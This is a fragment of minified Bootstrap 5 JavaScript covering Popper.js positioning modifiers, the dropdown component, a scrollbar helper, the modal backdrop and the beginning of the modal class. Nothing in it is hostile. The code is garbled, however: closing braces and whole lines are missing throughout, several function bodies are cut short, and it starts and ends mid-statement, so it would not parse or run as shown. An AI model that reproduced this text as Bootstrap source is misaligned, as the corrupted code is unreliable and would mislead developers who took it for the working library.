return a ? Object.assign({}, T, ((A = {})[b] = g ? "0" : "", A[_] = m ? "0" : "", A.transform = (v.devicePixelRatio || 1) < 2 ? "translate(" + u + "px, " + p + "px)" : "translate3d(" + u + "px, " + p + "px, 0)", A)) : Object.assign({}, T, ((e = {})[b] = g ? p + "px" : "", e[_] = m ? u + "px" : "", e.transform = "", e))
var Pt = {
name: "computeStyles",
enabled: !0,
phase: "beforeWrite",
fn: function (t) {
var e = t.state,
i = t.options,
n = i.gpuAcceleration,
s = void 0 === n || n,
o = i.adaptive,
r = void 0 === o || o,
a = i.roundOffsets,
l = void 0 === a || a,
c = {
placement: gt(e.placement),
popper: e.elements.popper,
popperRect: e.rects.popper,
gpuAcceleration: s
null != e.modifiersData.popperOffsets && (e.styles.popper = Object.assign({}, e.styles.popper, Mt(Object.assign({}, c, {
offsets: e.modifiersData.popperOffsets,
position: e.options.strategy,
adaptive: r,
roundOffsets: l
})))), null != e.modifiersData.arrow && (e.styles.arrow = Object.assign({}, e.styles.arrow, Mt(Object.assign({}, c, {
offsets: e.modifiersData.arrow,
position: "absolute",
adaptive: !1,
roundOffsets: l
})))), e.attributes.popper = Object.assign({}, e.attributes.popper, {
"data-popper-placement": e.placement
data: {}
Ht = {
passive: !0
Rt = {
name: "eventListeners",
enabled: !0,
phase: "write",
fn: function () { },
effect: function (t) {
var e = t.state,
i = t.instance,
n = t.options,
s = n.scroll,
o = void 0 === s || s,
r = n.resize,
a = void 0 === r || r,
l = dt(e.elements.popper),
c = [].concat(e.scrollParents.reference, e.scrollParents.popper);
return o && c.forEach((function (t) {
t.addEventListener("scroll", i.update, Ht)
})), a && l.addEventListener("resize", i.update, Ht),
function () {
o && c.forEach((function (t) {
t.removeEventListener("scroll", i.update, Ht)
})), a && l.removeEventListener("resize", i.update, Ht)
data: {}
Bt = {
left: "right",
right: "left",
bottom: "top",
top: "bottom"
function Wt(t) {
return t.replace(/left|right|bottom|top/g, (function (t) {
return Bt[t]
var qt = {
start: "end",
end: "start"
function zt(t) {
return t.replace(/start|end/g, (function (t) {
return qt[t]
function $t(t) {
var e = dt(t);
return {
scrollLeft: e.pageXOffset,
scrollTop: e.pageYOffset
function Ut(t) {
return _t(Et(t)).left + $t(t).scrollLeft
function Ft(t) {
var e = yt(t),
i = e.overflow,
n = e.overflowX,
s = e.overflowY;
return /auto|scroll|overlay|hidden/.test(i + s + n)
function Vt(t, e) {
var i;
void 0 === e && (e = []);
var n = function t(e) {
return ["html", "body", "#document"].indexOf(ht(e)) >= 0 ? e.ownerDocument.body : ft(e) && Ft(e) ? e : t(At(e))
s = n === (null == (i = t.ownerDocument) ? void 0 : i.body),
o = dt(n),
r = s ? [o].concat(o.visualViewport || [], Ft(n) ? n : []) : n,
a = e.concat(r);
return s ? a : a.concat(Vt(At(r)))
function Kt(t) {
return Object.assign({}, t, {
left: t.x,
top: t.y,
right: t.x + t.width,
bottom: t.y + t.height
function Xt(t, e) {
return "viewport" === e ? Kt(function (t) {
var e = dt(t),
i = Et(t),
n = e.visualViewport,
s = i.clientWidth,
o = i.clientHeight,
r = 0,
a = 0;
return n && (s = n.width, o = n.height, /^((?!chrome|android).)*safari/i.test(navigator.userAgent) || (r = n.offsetLeft, a = n.offsetTop)), {
width: s,
height: o,
x: r + Ut(t),
y: a
}(t)) : ft(e) ? function (t) {
var e = _t(t);
return e.top = e.top + t.clientTop, e.left = e.left + t.clientLeft, e.bottom = e.top + t.clientHeight, e.right = e.left + t.clientWidth, e.width = t.clientWidth, e.height = t.clientHeight, e.x = e.left, e.y = e.top, e
}(e) : Kt(function (t) {
var e, i = Et(t),
n = $t(t),
s = null == (e = t.ownerDocument) ? void 0 : e.body,
o = kt(i.scrollWidth, i.clientWidth, s ? s.scrollWidth : 0, s ? s.clientWidth : 0),
r = kt(i.scrollHeight, i.clientHeight, s ? s.scrollHeight : 0, s ? s.clientHeight : 0),
a = -n.scrollLeft + Ut(t),
l = -n.scrollTop;
return "rtl" === yt(s || i).direction && (a += kt(i.clientWidth, s ? s.clientWidth : 0) - o), {
width: o,
height: r,
x: a,
y: l
function Yt(t) {
return t.split("-")[1]
function Qt(t) {
var e, i = t.reference,
n = t.element,
s = t.placement,
o = s ? gt(s) : null,
r = s ? Yt(s) : null,
a = i.x + i.width / 2 - n.width / 2,
l = i.y + i.height / 2 - n.height / 2;
switch (o) {
case it:
e = {
x: a,
y: i.y - n.height
case nt:
e = {
x: a,
y: i.y + i.height
case st:
e = {
x: i.x + i.width,
y: l
case ot:
e = {
x: i.x - n.width,
y: l
e = {
x: i.x,
y: i.y
var c = o ? Ct(o) : null;
if (null != c) {
var h = "y" === c ? "height" : "width";
switch (r) {
case "start":
e[c] = e[c] - (i[h] / 2 - n[h] / 2);
case "end":
e[c] = e[c] + (i[h] / 2 - n[h] / 2)
return e
function Gt(t, e) {
void 0 === e && (e = {});
var i = e,
n = i.placement,
s = void 0 === n ? t.placement : n,
o = i.boundary,
r = void 0 === o ? "clippingParents" : o,
a = i.rootBoundary,
l = void 0 === a ? "viewport" : a,
c = i.elementContext,
h = void 0 === c ? "popper" : c,
d = i.altBoundary,
u = void 0 !== d && d,
f = i.padding,
p = void 0 === f ? 0 : f,
m = St("number" != typeof p ? p : It(p, rt)),
g = "popper" === h ? "reference" : "popper",
_ = t.elements.reference,
b = t.rects.popper,
v = t.elements[u ? g : h],
y = function (t, e, i) {
var n = "clippingParents" === e ? function (t) {
var e = Vt(At(t)),
i = ["absolute", "fixed"].indexOf(yt(t).position) >= 0 && ft(t) ? Ot(t) : t;
return ut(i) ? e.filter((function (t) {
return ut(t) && vt(t, i) && "body" !== ht(t)
})) : []
}(t) : [].concat(e),
s = [].concat(n, [i]),
o = s[0],
r = s.reduce((function (e, i) {
var n = Xt(t, i);
return e.top = kt(n.top, e.top), e.right = Lt(n.right, e.right), e.bottom = Lt(n.bottom, e.bottom), e.left = kt(n.left, e.left), e
}), Xt(t, o));
return r.width = r.right - r.left, r.height = r.bottom - r.top, r.x = r.left, r.y = r.top, r
}(ut(v) ? v : v.contextElement || Et(t.elements.popper), r, l),
w = _t(_),
E = Qt({
reference: w,
element: b,
strategy: "absolute",
placement: s
A = Kt(Object.assign({}, b, E)),
T = "popper" === h ? A : w,
O = {
top: y.top - T.top + m.top,
bottom: T.bottom - y.bottom + m.bottom,
left: y.left - T.left + m.left,
right: T.right - y.right + m.right
C = t.modifiersData.offset;
if ("popper" === h && C) {
var k = C[s];
Object.keys(O).forEach((function (t) {
var e = [st, nt].indexOf(t) >= 0 ? 1 : -1,
i = [it, nt].indexOf(t) >= 0 ? "y" : "x";
O[t] += k[i] * e
return O
function Zt(t, e) {
void 0 === e && (e = {});
var i = e,
n = i.placement,
s = i.boundary,
o = i.rootBoundary,
r = i.padding,
a = i.flipVariations,
l = i.allowedAutoPlacements,
c = void 0 === l ? lt : l,
h = Yt(n),
d = h ? a ? at : at.filter((function (t) {
return Yt(t) === h
})) : rt,
u = d.filter((function (t) {
return c.indexOf(t) >= 0
0 === u.length && (u = d);
var f = u.reduce((function (e, i) {
return e[i] = Gt(t, {
placement: i,
boundary: s,
rootBoundary: o,
padding: r
})[gt(i)], e
}), {});
return Object.keys(f).sort((function (t, e) {
return f[t] - f[e]
var Jt = {
name: "flip",
enabled: !0,
phase: "main",
fn: function (t) {
var e = t.state,
i = t.options,
n = t.name;
if (!e.modifiersData[n]._skip) {
for (var s = i.mainAxis, o = void 0 === s || s, r = i.altAxis, a = void 0 === r || r, l = i.fallbackPlacements, c = i.padding, h = i.boundary, d = i.rootBoundary, u = i.altBoundary, f = i.flipVariations, p = void 0 === f || f, m = i.allowedAutoPlacements, g = e.options.placement, _ = gt(g), b = l || (_ !== g && p ? function (t) {
if ("auto" === gt(t)) return [];
var e = Wt(t);
return [zt(t), e, zt(e)]
}(g) : [Wt(g)]), v = [g].concat(b).reduce((function (t, i) {
return t.concat("auto" === gt(i) ? Zt(e, {
placement: i,
boundary: h,
rootBoundary: d,
padding: c,
flipVariations: p,
allowedAutoPlacements: m
}) : i)
}), []), y = e.rects.reference, w = e.rects.popper, E = new Map, A = !0, T = v[0], O = 0; O < v.length; O++) {
var C = v[O],
k = gt(C),
L = "start" === Yt(C),
x = [it, nt].indexOf(k) >= 0,
D = x ? "width" : "height",
S = Gt(e, {
placement: C,
boundary: h,
rootBoundary: d,
altBoundary: u,
padding: c
I = x ? L ? st : ot : L ? nt : it;
y[D] > w[D] && (I = Wt(I));
var N = Wt(I),
j = [];
if (o && j.push(S[k] <= 0), a && j.push(S[I] <= 0, S[N] <= 0), j.every((function (t) {
return t
}))) {
T = C, A = !1;
E.set(C, j)
if (A)
for (var M = function (t) {
var e = v.find((function (e) {
var i = E.get(e);
if (i) return i.slice(0, t).every((function (t) {
return t
if (e) return T = e, "break"
}, P = p ? 3 : 1; P > 0 && "break" !== M(P); P--);
e.placement !== T && (e.modifiersData[n]._skip = !0, e.placement = T, e.reset = !0)
requiresIfExists: ["offset"],
data: {
_skip: !1
function te(t, e, i) {
return void 0 === i && (i = {
x: 0,
y: 0
}), {
top: t.top - e.height - i.y,
right: t.right - e.width + i.x,
bottom: t.bottom - e.height + i.y,
left: t.left - e.width - i.x
function ee(t) {
return [it, st, nt, ot].some((function (e) {
return t[e] >= 0
var ie = {
name: "hide",
enabled: !0,
phase: "main",
requiresIfExists: ["preventOverflow"],
fn: function (t) {
var e = t.state,
i = t.name,
n = e.rects.reference,
s = e.rects.popper,
o = e.modifiersData.preventOverflow,
r = Gt(e, {
elementContext: "reference"
a = Gt(e, {
altBoundary: !0
l = te(r, n),
c = te(a, s, o),
h = ee(l),
d = ee(c);
e.modifiersData[i] = {
referenceClippingOffsets: l,
popperEscapeOffsets: c,
isReferenceHidden: h,
hasPopperEscaped: d
}, e.attributes.popper = Object.assign({}, e.attributes.popper, {
"data-popper-reference-hidden": h,
"data-popper-escaped": d
ne = {
name: "offset",
enabled: !0,
phase: "main",
requires: ["popperOffsets"],
fn: function (t) {
var e = t.state,
i = t.options,
n = t.name,
s = i.offset,
o = void 0 === s ? [0, 0] : s,
r = lt.reduce((function (t, i) {
return t[i] = function (t, e, i) {
var n = gt(t),
s = [ot, it].indexOf(n) >= 0 ? -1 : 1,
o = "function" == typeof i ? i(Object.assign({}, e, {
placement: t
})) : i,
r = o[0],
a = o[1];
return r = r || 0, a = (a || 0) * s, [ot, st].indexOf(n) >= 0 ? {
x: a,
y: r
} : {
x: r,
y: a
}(i, e.rects, o), t
}), {}),
a = r[e.placement],
l = a.x,
c = a.y;
null != e.modifiersData.popperOffsets && (e.modifiersData.popperOffsets.x += l, e.modifiersData.popperOffsets.y += c), e.modifiersData[n] = r
se = {
name: "popperOffsets",
enabled: !0,
phase: "read",
fn: function (t) {
var e = t.state,
i = t.name;
e.modifiersData[i] = Qt({
reference: e.rects.reference,
element: e.rects.popper,
strategy: "absolute",
placement: e.placement
data: {}
oe = {
name: "preventOverflow",
enabled: !0,
phase: "main",
fn: function (t) {
var e = t.state,
i = t.options,
n = t.name,
s = i.mainAxis,
o = void 0 === s || s,
r = i.altAxis,
a = void 0 !== r && r,
l = i.boundary,
c = i.rootBoundary,
h = i.altBoundary,
d = i.padding,
u = i.tether,
f = void 0 === u || u,
p = i.tetherOffset,
m = void 0 === p ? 0 : p,
g = Gt(e, {
boundary: l,
rootBoundary: c,
padding: d,
altBoundary: h
_ = gt(e.placement),
b = Yt(e.placement),
v = !b,
y = Ct(_),
w = "x" === y ? "y" : "x",
E = e.modifiersData.popperOffsets,
A = e.rects.reference,
T = e.rects.popper,
O = "function" == typeof m ? m(Object.assign({}, e.rects, {
placement: e.placement
})) : m,
C = {
x: 0,
y: 0
if (E) {
if (o || a) {
var k = "y" === y ? it : ot,
L = "y" === y ? nt : st,
x = "y" === y ? "height" : "width",
D = E[y],
S = E[y] + g[k],
I = E[y] - g[L],
N = f ? -T[x] / 2 : 0,
j = "start" === b ? A[x] : T[x],
M = "start" === b ? -T[x] : -A[x],
P = e.elements.arrow,
H = f && P ? bt(P) : {
width: 0,
height: 0
R = e.modifiersData["arrow#persistent"] ? e.modifiersData["arrow#persistent"].padding : {
top: 0,
right: 0,
bottom: 0,
left: 0
B = R[k],
W = R[L],
q = Dt(0, A[x], H[x]),
z = v ? A[x] / 2 - N - q - B - O : j - q - B - O,
$ = v ? -A[x] / 2 + N + q + W + O : M + q + W + O,
U = e.elements.arrow && Ot(e.elements.arrow),
F = U ? "y" === y ? U.clientTop || 0 : U.clientLeft || 0 : 0,
V = e.modifiersData.offset ? e.modifiersData.offset[e.placement][y] : 0,
K = E[y] + z - V - F,
X = E[y] + $ - V;
if (o) {
var Y = Dt(f ? Lt(S, K) : S, D, f ? kt(I, X) : I);
E[y] = Y, C[y] = Y - D
if (a) {
var Q = "x" === y ? it : ot,
G = "x" === y ? nt : st,
Z = E[w],
J = Z + g[Q],
tt = Z - g[G],
et = Dt(f ? Lt(J, K) : J, Z, f ? kt(tt, X) : tt);
E[w] = et, C[w] = et - Z
e.modifiersData[n] = C
requiresIfExists: ["offset"]
function re(t, e, i) {
void 0 === i && (i = !1);
var n, s, o = Et(e),
r = _t(t),
a = ft(e),
l = {
scrollLeft: 0,
scrollTop: 0
c = {
x: 0,
y: 0
return (a || !a && !i) && (("body" !== ht(e) || Ft(o)) && (l = (n = e) !== dt(n) && ft(n) ? {
scrollLeft: (s = n).scrollLeft,
scrollTop: s.scrollTop
} : $t(n)), ft(e) ? ((c = _t(e)).x += e.clientLeft, c.y += e.clientTop) : o && (c.x = Ut(o))), {
x: r.left + l.scrollLeft - c.x,
y: r.top + l.scrollTop - c.y,
width: r.width,
height: r.height
var ae = {
placement: "bottom",
modifiers: [],
strategy: "absolute"
function le() {
for (var t = arguments.length, e = new Array(t), i = 0; i < t; i++) e[i] = arguments[i];
return !e.some((function (t) {
return !(t && "function" == typeof t.getBoundingClientRect)
function ce(t) {
void 0 === t && (t = {});
var e = t,
i = e.defaultModifiers,
n = void 0 === i ? [] : i,
s = e.defaultOptions,
o = void 0 === s ? ae : s;
return function (t, e, i) {
void 0 === i && (i = o);
var s, r, a = {
placement: "bottom",
orderedModifiers: [],
options: Object.assign({}, ae, o),
modifiersData: {},
elements: {
reference: t,
popper: e
attributes: {},
styles: {}
l = [],
c = !1,
h = {
state: a,
setOptions: function (i) {
d(), a.options = Object.assign({}, o, a.options, i), a.scrollParents = {
reference: ut(t) ? Vt(t) : t.contextElement ? Vt(t.contextElement) : [],
popper: Vt(e)
var s, r, c = function (t) {
var e = function (t) {
var e = new Map,
i = new Set,
n = [];
return t.forEach((function (t) {
e.set(t.name, t)
})), t.forEach((function (t) {
i.has(t.name) || function t(s) {
i.add(s.name), [].concat(s.requires || [], s.requiresIfExists || []).forEach((function (n) {
if (!i.has(n)) {
var s = e.get(n);
s && t(s)
})), n.push(s)
})), n
return ct.reduce((function (t, i) {
return t.concat(e.filter((function (t) {
return t.phase === i
}), [])
}((s = [].concat(n, a.options.modifiers), r = s.reduce((function (t, e) {
var i = t[e.name];
return t[e.name] = i ? Object.assign({}, i, e, {
options: Object.assign({}, i.options, e.options),
data: Object.assign({}, i.data, e.data)
}) : e, t
}), {}), Object.keys(r).map((function (t) {
return r[t]
return a.orderedModifiers = c.filter((function (t) {
return t.enabled
})), a.orderedModifiers.forEach((function (t) {
var e = t.name,
i = t.options,
n = void 0 === i ? {} : i,
s = t.effect;
if ("function" == typeof s) {
var o = s({
state: a,
name: e,
instance: h,
options: n
l.push(o || function () { })
})), h.update()
forceUpdate: function () {
if (!c) {
var t = a.elements,
e = t.reference,
i = t.popper;
if (le(e, i)) {
a.rects = {
reference: re(e, Ot(i), "fixed" === a.options.strategy),
popper: bt(i)
}, a.reset = !1, a.placement = a.options.placement, a.orderedModifiers.forEach((function (t) {
return a.modifiersData[t.name] = Object.assign({}, t.data)
for (var n = 0; n < a.orderedModifiers.length; n++)
if (!0 !== a.reset) {
var s = a.orderedModifiers[n],
o = s.fn,
r = s.options,
l = void 0 === r ? {} : r,
d = s.name;
"function" == typeof o && (a = o({
state: a,
options: l,
name: d,
instance: h
}) || a)
} else a.reset = !1, n = -1
update: (s = function () {
return new Promise((function (t) {
h.forceUpdate(), t(a)
}, function () {
return r || (r = new Promise((function (t) {
Promise.resolve().then((function () {
r = void 0, t(s())
}))), r
destroy: function () {
d(), c = !0
if (!le(t, e)) return h;
function d() {
l.forEach((function (t) {
return t()
})), l = []
return h.setOptions(i).then((function (t) {
!c && i.onFirstUpdate && i.onFirstUpdate(t)
})), h
var he = ce(),
de = ce({
defaultModifiers: [Rt, se, Pt, mt]
ue = ce({
defaultModifiers: [Rt, se, Pt, mt, ne, Jt, oe, Nt, ie]
fe = Object.freeze({
__proto__: null,
popperGenerator: ce,
detectOverflow: Gt,
createPopperBase: he,
createPopper: ue,
createPopperLite: de,
top: it,
bottom: nt,
right: st,
left: ot,
auto: "auto",
basePlacements: rt,
start: "start",
end: "end",
clippingParents: "clippingParents",
viewport: "viewport",
popper: "popper",
reference: "reference",
variationPlacements: at,
placements: lt,
beforeRead: "beforeRead",
read: "read",
afterRead: "afterRead",
beforeMain: "beforeMain",
main: "main",
afterMain: "afterMain",
beforeWrite: "beforeWrite",
write: "write",
afterWrite: "afterWrite",
modifierPhases: ct,
applyStyles: mt,
arrow: Nt,
computeStyles: Pt,
eventListeners: Rt,
flip: Jt,
hide: ie,
offset: ne,
popperOffsets: se,
preventOverflow: oe
const pe = new RegExp("ArrowUp|ArrowDown|Escape"),
me = g() ? "top-end" : "top-start",
ge = g() ? "top-start" : "top-end",
_e = g() ? "bottom-end" : "bottom-start",
be = g() ? "bottom-start" : "bottom-end",
ve = g() ? "left-start" : "right-start",
ye = g() ? "right-start" : "left-start",
we = {
offset: [0, 2],
boundary: "clippingParents",
reference: "toggle",
display: "dynamic",
popperConfig: null,
autoClose: !0
Ee = {
offset: "(array|string|function)",
boundary: "(string|element)",
reference: "(string|element|object)",
display: "string",
popperConfig: "(null|object|function)",
autoClose: "(boolean|string)"
class Ae extends B {
constructor(t, e) {
super(t), this._popper = null, this._config = this._getConfig(e), this._menu = this._getMenuElement(), this._inNavbar = this._detectNavbar(), this._addEventListeners()
static get Default() {
return we
static get DefaultType() {
return Ee
static get NAME() {
return "dropdown"
toggle() {
h(this._element) || (this._element.classList.contains("show") ? this.hide() : this.show())
show() {
if (h(this._element) || this._menu.classList.contains("show")) return;
const t = Ae.getParentFromElement(this._element),
e = {
relatedTarget: this._element
if (!P.trigger(this._element, "show.bs.dropdown", e).defaultPrevented) {
if (this._inNavbar) U.setDataAttribute(this._menu, "popper", "none");
else {
if (void 0 === fe) throw new TypeError("Bootstrap's dropdowns require Popper (https://popper.js.org)");
let e = this._element;
"parent" === this._config.reference ? e = t : r(this._config.reference) ? e = a(this._config.reference) : "object" == typeof this._config.reference && (e = this._config.reference);
const i = this._getPopperConfig(),
n = i.modifiers.find(t => "applyStyles" === t.name && !1 === t.enabled);
this._popper = ue(e, this._menu, i), n && U.setDataAttribute(this._menu, "popper", "static")
"ontouchstart" in document.documentElement && !t.closest(".navbar-nav") && [].concat(...document.body.children).forEach(t => P.on(t, "mouseover", u)), this._element.focus(), this._element.setAttribute("aria-expanded", !0), this._menu.classList.toggle("show"), this._element.classList.toggle("show"), P.trigger(this._element, "shown.bs.dropdown", e)
hide() {
if (h(this._element) || !this._menu.classList.contains("show")) return;
const t = {
relatedTarget: this._element
dispose() {
this._popper && this._popper.destroy(), super.dispose()
update() {
this._inNavbar = this._detectNavbar(), this._popper && this._popper.update()
_addEventListeners() {
P.on(this._element, "click.bs.dropdown", t => {
t.preventDefault(), this.toggle()
_completeHide(t) {
P.trigger(this._element, "hide.bs.dropdown", t).defaultPrevented || ("ontouchstart" in document.documentElement && [].concat(...document.body.children).forEach(t => P.off(t, "mouseover", u)), this._popper && this._popper.destroy(), this._menu.classList.remove("show"), this._element.classList.remove("show"), this._element.setAttribute("aria-expanded", "false"), U.removeDataAttribute(this._menu, "popper"), P.trigger(this._element, "hidden.bs.dropdown", t))
_getConfig(t) {
if (t = {
}, l("dropdown", t, this.constructor.DefaultType), "object" == typeof t.reference && !r(t.reference) && "function" != typeof t.reference.getBoundingClientRect) throw new TypeError("dropdown".toUpperCase() + ': Option "reference" provided type "object" without a required "getBoundingClientRect" method.');
return t
_getMenuElement() {
return t.next(this._element, ".dropdown-menu")[0]
_getPlacement() {
const t = this._element.parentNode;
if (t.classList.contains("dropend")) return ve;
if (t.classList.contains("dropstart")) return ye;
const e = "end" === getComputedStyle(this._menu).getPropertyValue("--bs-position").trim();
return t.classList.contains("dropup") ? e ? ge : me : e ? be : _e
_detectNavbar() {
return null !== this._element.closest(".navbar")
_getOffset() {
const {
offset: t
} = this._config;
return "string" == typeof t ? t.split(",").map(t => Number.parseInt(t, 10)) : "function" == typeof t ? e => t(e, this._element) : t
_getPopperConfig() {
const t = {
placement: this._getPlacement(),
modifiers: [{
name: "preventOverflow",
options: {
boundary: this._config.boundary
}, {
name: "offset",
options: {
offset: this._getOffset()
return "static" === this._config.display && (t.modifiers = [{
name: "applyStyles",
enabled: !1
}]), {
..."function" == typeof this._config.popperConfig ? this._config.popperConfig(t) : this._config.popperConfig
key: e,
target: i
}) {
const n = t.find(".dropdown-menu .dropdown-item:not(.disabled):not(:disabled)", this._menu).filter(c);
n.length && y(n, i, "ArrowDown" === e, !n.includes(i)).focus()
static dropdownInterface(t, e) {
const i = Ae.getOrCreateInstance(t, e);
if ("string" == typeof e) {
if (void 0 === i[e]) throw new TypeError(`No method named "${e}"`);
static jQueryInterface(t) {
return this.each((function () {
Ae.dropdownInterface(this, t)
static clearMenus(e) {
if (e && (2 === e.button || "keyup" === e.type && "Tab" !== e.key)) return;
const i = t.find('[data-bs-toggle="dropdown"]');
for (let t = 0, n = i.length; t < n; t++) {
const n = Ae.getInstance(i[t]);
if (!n || !1 === n._config.autoClose) continue;
if (!n._element.classList.contains("show")) continue;
const s = {
relatedTarget: n._element
if (e) {
const t = e.composedPath(),
i = t.includes(n._menu);
if (t.includes(n._element) || "inside" === n._config.autoClose && !i || "outside" === n._config.autoClose && i) continue;
if (n._menu.contains(e.target) && ("keyup" === e.type && "Tab" === e.key || /input|select|option|textarea|form/i.test(e.target.tagName))) continue;
"click" === e.type && (s.clickEvent = e)
static getParentFromElement(t) {
return s(t) || t.parentNode
static dataApiKeydownHandler(e) {
if (/input|textarea/i.test(e.target.tagName) ? "Space" === e.key || "Escape" !== e.key && ("ArrowDown" !== e.key && "ArrowUp" !== e.key || e.target.closest(".dropdown-menu")) : !pe.test(e.key)) return;
const i = this.classList.contains("show");
if (!i && "Escape" === e.key) return;
if (e.preventDefault(), e.stopPropagation(), h(this)) return;
const n = () => this.matches('[data-bs-toggle="dropdown"]') ? this : t.prev(this, '[data-bs-toggle="dropdown"]')[0];
return "Escape" === e.key ? (n().focus(), void Ae.clearMenus()) : "ArrowUp" === e.key || "ArrowDown" === e.key ? (i || n().click(), void Ae.getInstance(n())._selectMenuItem(e)) : void (i && "Space" !== e.key || Ae.clearMenus())
P.on(document, "keydown.bs.dropdown.data-api", '[data-bs-toggle="dropdown"]', Ae.dataApiKeydownHandler), P.on(document, "keydown.bs.dropdown.data-api", ".dropdown-menu", Ae.dataApiKeydownHandler), P.on(document, "click.bs.dropdown.data-api", Ae.clearMenus), P.on(document, "keyup.bs.dropdown.data-api", Ae.clearMenus), P.on(document, "click.bs.dropdown.data-api", '[data-bs-toggle="dropdown"]', (function (t) {
t.preventDefault(), Ae.dropdownInterface(this)
})), _(Ae);
class Te {
constructor() {
this._element = document.body
getWidth() {
const t = document.documentElement.clientWidth;
return Math.abs(window.innerWidth - t)
hide() {
const t = this.getWidth();
this._disableOverFlow(), this._setElementAttributes(this._element, "paddingRight", e => e + t), this._setElementAttributes(".fixed-top, .fixed-bottom, .is-fixed, .sticky-top", "paddingRight", e => e + t), this._setElementAttributes(".sticky-top", "marginRight", e => e - t)
_disableOverFlow() {
this._saveInitialAttribute(this._element, "overflow"), this._element.style.overflow = "hidden"
_setElementAttributes(t, e, i) {
const n = this.getWidth();
this._applyManipulationCallback(t, t => {
if (t !== this._element && window.innerWidth > t.clientWidth + n) return;
this._saveInitialAttribute(t, e);
const s = window.getComputedStyle(t)[e];
t.style[e] = i(Number.parseFloat(s)) + "px"
reset() {
this._resetElementAttributes(this._element, "overflow"), this._resetElementAttributes(this._element, "paddingRight"), this._resetElementAttributes(".fixed-top, .fixed-bottom, .is-fixed, .sticky-top", "paddingRight"), this._resetElementAttributes(".sticky-top", "marginRight")
_saveInitialAttribute(t, e) {
const i = t.style[e];
i && U.setDataAttribute(t, e, i)
_resetElementAttributes(t, e) {
this._applyManipulationCallback(t, t => {
const i = U.getDataAttribute(t, e);
void 0 === i ? t.style.removeProperty(e) : (U.removeDataAttribute(t, e), t.style[e] = i)
_applyManipulationCallback(e, i) {
r(e) ? i(e) : t.find(e, this._element).forEach(i)
isOverflowing() {
return this.getWidth() > 0
const Oe = {
isVisible: !0,
isAnimated: !1,
rootElement: "body",
clickCallback: null
Ce = {
isVisible: "boolean",
isAnimated: "boolean",
rootElement: "(element|string)",
clickCallback: "(function|null)"
class ke {
constructor(t) {
this._config = this._getConfig(t), this._isAppended = !1, this._element = null
show(t) {
this._config.isVisible ? (this._append(), this._config.isAnimated && f(this._getElement()), this._getElement().classList.add("show"), this._emulateAnimation(() => {
})) : b(t)
hide(t) {
this._config.isVisible ? (this._getElement().classList.remove("show"), this._emulateAnimation(() => {
this.dispose(), b(t)
})) : b(t)
_getElement() {
if (!this._element) {
const t = document.createElement("div");
t.className = "modal-backdrop", this._config.isAnimated && t.classList.add("fade"), this._element = t
return this._element
_getConfig(t) {
return (t = {
..."object" == typeof t ? t : {}
}).rootElement = a(t.rootElement), l("backdrop", t, Ce), t
_append() {
this._isAppended || (this._config.rootElement.appendChild(this._getElement()), P.on(this._getElement(), "mousedown.bs.backdrop", () => {
}), this._isAppended = !0)
dispose() {
this._isAppended && (P.off(this._element, "mousedown.bs.backdrop"), this._element.remove(), this._isAppended = !1)
_emulateAnimation(t) {
v(t, this._getElement(), this._config.isAnimated)
const Le = {
backdrop: !0,
keyboard: !0,
focus: !0
xe = {
backdrop: "(boolean|string)",
keyboard: "boolean",
focus: "boolean"
class De extends B {
constructor(e, i) {
super(e), this._config = this._getConfig(i), this._dialog = t.findOne(".modal-dialog", this._element), this._backdrop = this._initializeBackDrop(), this._isShown = !1, this._ignoreBackdropClick = !1, this._isTransitioning = !1, this._scrollBar = new Te
static get Default() {
return Le
static get NAME() {
return "modal"
toggle(t) {
return this._isShown ? this.hide() : this.show(t)
show(t) {
this._isShown || this._isTransitioning || P.trigger(this._element, "show.bs.modal", {
relatedTarget: t
}).defaultPrevented || (this._isShown = !0, this._isAnimated() && (this._isTransitioning = !0), this._scrollBar.hide(), document.body.classList.add("modal-open"), this._adjustDialog(), this._setEscapeEvent(), this._setResizeEvent(), P.on(this._element, "click.dismiss.bs.modal", '[data-bs-dismiss="modal"]', t => this.hide(t)), P.on(this._dialog, "mousedown.dismiss.bs.modal", () => {
P.one(this._element, "mouseup.dismiss.bs.modal", t => {
t.target === this._element && (this._ignoreBackdropClick = !0)
}), this._showBackdrop(() => this._showElement(t)))
hide(t) {
if (t && ["A", "AREA"].includes(t.target.tagName) && t.preventDefault(), !this._isShown || this._isTransitioning) return;
if (P.trigger(this._element, "hide.bs.modal").defaultPrevented) return;
this._isShown = !1;
const e = this._isAnimated();
e && (this._isTransitioning = !0), this._setEscapeEvent(), this._setResizeEvent(), P.off(document, "focusin.bs.modal"), this._element.classList.remove("show"), P.off(this._element, "click.dismiss.bs.modal"), P.off(this._dialog, "mousedown.dismiss.bs.modal"), this._queueCallback(() => this._hideModal(), this._element, e)
dispose() {
[window, this._dialog].forEach(t => P.off(t, ".bs.modal")), this._backdrop.dispose(), super.dispose(), P.off(document, "focusin.bs.modal")
handleUpdate() {
_initializeBackDrop() {
return new ke({
isVisible: Boolean(this._config.backdrop),
isAnimated: this._isAnimated()
_getConfig(t) {
return t = {
..."object" == typeof t ? t : {}
}, l("modal", t, xe), t
_showElement(e) {
const i = this._isAnimated(),
n = t.findOne(".modal-body", this._dialog);
this._element.parentNode && this._element.parentNode.nodeType === Node.ELEMENT_NODE || document.body.appendChild(this._element), this._element.style.display = "block", this._element.removeAttribute("aria-hidden"), this._element.setAttribute("aria-modal", !0), this._element.setAttribute("role", "dialog"), this._element.scrollTop = 0, n && (n.scrollTop = 0), i && f(this._element), this._element.classList.add("show"), this._config.focus && this._enforceFocus(), this._queueCallback(() => {
this._config.focus && this._element.focus(), this._isTransitioning = !1, P.trigger(this._element, "shown.bs.modal", {
relatedTarget: e
}, this._dialog, i)
_enforceFocus() {
P.off(document, "focusin.bs.modal"), P.on(document, "focusin.bs.modal", t => {
document === t.target || this._element === t.target || this._element.contains(t.target) || this._element.focus()
_setEscapeEvent() {
this._isShown ? P.on(this._element, "keydown.dismiss.bs.modal", t => {
this._config.keyboard && "Escape" === t.key ? (t.preventDefault(), this.hide()) : this._config.keyboard || "Escape" !== t.key || this._triggerBackdropTransition()
}) : P.off(this._element, "keydown.dismiss.bs.modal")
_setResizeEvent() {
this._isShown ? P.on(window, "resize.bs.modal", () => this._adjustDialog()) : P.off(window, "resize.bs.modal")
_hideModal() {
this._element.style.display = "none", this._element.setAttribute("aria-hidden", !0), this._element.removeAttribute("aria-modal"), this._element.removeAttribute("role"), this._isTransitioning = !1, this._backdrop.hide(() => {
document.body.classList.remove("modal-open"), this._resetAdjustments(), this._scrollBar.reset(), P.trigger(this._element, "hidden.bs.modal")
_showBackdrop(t) {
P.on(this._element, "click.dismiss.bs.modal", t => {
